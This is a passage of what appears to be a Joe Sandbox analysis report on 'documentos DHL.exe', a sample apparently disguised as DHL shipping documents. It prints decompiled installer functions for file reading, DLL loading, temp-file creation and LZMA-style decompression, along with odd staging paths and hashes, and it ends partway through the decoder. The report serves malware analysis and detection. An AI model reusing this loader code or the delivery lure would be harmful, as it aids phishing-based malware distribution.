Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp$C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll$C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition$Call
API String ID: 1941528284-2776294926
Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E00406310(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405F83( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405F25( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004062F7( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x00402644
0x00402646
0x00402649
0x0040264b
0x0040264e
0x00402653
0x00402657
0x0040265a
0x0040265d
0x00402abf
0x00402ac2
0x00402663
0x00402663
0x0040266a
0x0040266c
0x0040266c
0x00402672
0x004027d6
0x004027d6
0x004027d9
0x004027de
0x004015b6
0x00402885
0x00402885
0x00000000
0x00402678
0x00402679
0x00402684
0x00402687
0x00402693
0x00402697
0x0040272f
0x00402747
0x00402757
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040269d
0x0040269d
0x004026a0
0x004026a1
0x004026a4
0x004026a9
0x004026b0
0x004026b8
0x00000000
0x004026be
0x004026be
0x004026c3
0x00000000
0x004026c9
0x004026c9
0x004026d1
0x004026d4
0x004026d7
0x00402792
0x00402799
0x004026dd
0x004026e3
0x004026ef
0x00402759
0x00402759
0x004026f1
0x004026f1
0x004026f4
0x004026f6
0x004026f6
0x004026f6
0x004026f9
0x004026fe
0x00402701
0x00000000
0x00000000
0x00402703
0x00402706
0x0040270e
0x0040271a
0x00402728
0x00000000
0x0040272a
0x00000000
0x0040272a
0x00000000
0x00402728
0x004026f6
0x0040275c
0x0040275f
0x00000000
0x00402761
0x00402766
0x004027a7
0x004027c9
0x004027d0
0x004027b5
0x004027b5
0x004027b8
0x004027bb
0x004027be
0x004027be
0x00000000
0x0040276f
0x0040276f
0x00402772
0x00402775
0x0040277b
0x0040277f
0x00402782
0x00000000
0x00000000
0x00000000
0x00000000
0x00402782
0x00402766
0x0040275f
0x004026d7
0x004026c3
0x004026b8
0x00000000
0x00402784
0x00402784
0x00402787
0x00402790
0x00000000
0x00402687
0x00402672
0x00402ac8
0x00402ace

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724

Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040671A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040671A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x00406731
0x0040673a
0x0040673c
0x0040673c
0x00406740
0x00406753
0x0040674d
0x0040674d
0x0040674d
0x0040676c
0x00406780
0x00406787

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
wsprintfW.USER32 ref: 0040676C
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780

Strings

UXTHEME, xrefs: 00406723
%s%S.dll, xrefs: 00406766
\, xrefs: 00406742

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798

Uniqueness

Uniqueness Score: -1.00%

Function 004058E3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004058E3(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004058ee
0x004058f2
0x004058f5
0x004058fb
0x004058ff
0x00405903
0x0040590b
0x00405912
0x00405918
0x0040591f
0x00405926
0x0040592e
0x00405930
0x00000000
0x00405930
0x0040593a
0x00405941
0x00405957
0x00000000
0x00000000
0x00000000
0x00405959
0x0040595d

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
GetLastError.KERNEL32 ref: 0040593A
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
GetLastError.KERNEL32 ref: 00405959

Strings

C:\Users\user\Desktop, xrefs: 004058E3

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405ED1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405ED1(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a58c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405ed7
0x00405edd
0x00405ede
0x00405ede
0x00405ee3
0x00405ee4
0x00405ee7
0x00405eec
0x00405eef
0x00405ef9
0x00405f06
0x00405f0a
0x00405f12
0x00000000
0x00000000
0x00405f16
0x00000000
0x00405f18
0x00405f18
0x00405f18
0x00405f1b
0x00405f1e
0x00405f1e
0x00405f21
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405EEF
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\documentos DHL.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76523420,004036D5), ref: 00405F0A

Strings

nsa, xrefs: 00405EDE
"C:\Users\user\Desktop\documentos DHL.exe", xrefs: 00405ED1
C:\Users\user\AppData\Local\Temp\, xrefs: 00405ED6, 00405EDA

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\documentos DHL.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1544187388
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040690B Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040690B(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M0040735D))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
